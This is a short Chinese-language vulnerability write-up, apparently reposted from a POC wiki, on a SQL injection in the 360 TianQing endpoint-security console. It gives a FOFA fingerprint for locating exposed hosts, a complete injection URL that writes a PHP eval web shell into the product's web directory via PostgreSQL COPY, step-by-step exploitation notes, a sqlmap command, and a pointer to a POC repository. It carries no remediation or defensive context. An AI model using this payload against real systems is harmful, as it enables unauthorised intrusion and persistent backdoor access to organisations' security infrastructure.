360 天擎 前台SQL注入 2021 HW
漏洞描述
天擎 存在SQL注入,攻击者可以通过漏洞上传木马
漏洞影响
Note
天擎
FOFA
Note
title="360新天擎"
漏洞复现
注入写shell:https://192.168.24.196:8443/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:\Program Files (x86)\360\skylar6\www\1.php';drop table O;--
利用过程:1. 通过安装包安装的一般都有root权限,因此该注入点可尝试写shell2. 通过注入点,创建一张表 O3. 为 表O 添加一个新字段 T 并且写入shell内容4. Postgres数据库 使用COPY TO把一个表的所有内容都拷贝到一个文件(完成写shell)5. 删除 表O
使用命令
sqlmap -u https://xxx.xxx.xxx.xxx:8443/api/dp/rptsvcsyncpoint?ccid=1 --dbms PostgreSQL
Goby & POC
Note
已上传 https://github.com/PeiQi0/PeiQi-WIKI-POC Goby & POC 目录中
360 TianQing ccid SQL injectable
原文: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%A4%A9%E6%93%8E/%E5%A4%A9%E6%93%8E%20%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5.html
搜索更多相关主题的帖子:
360 天擎 SQL注入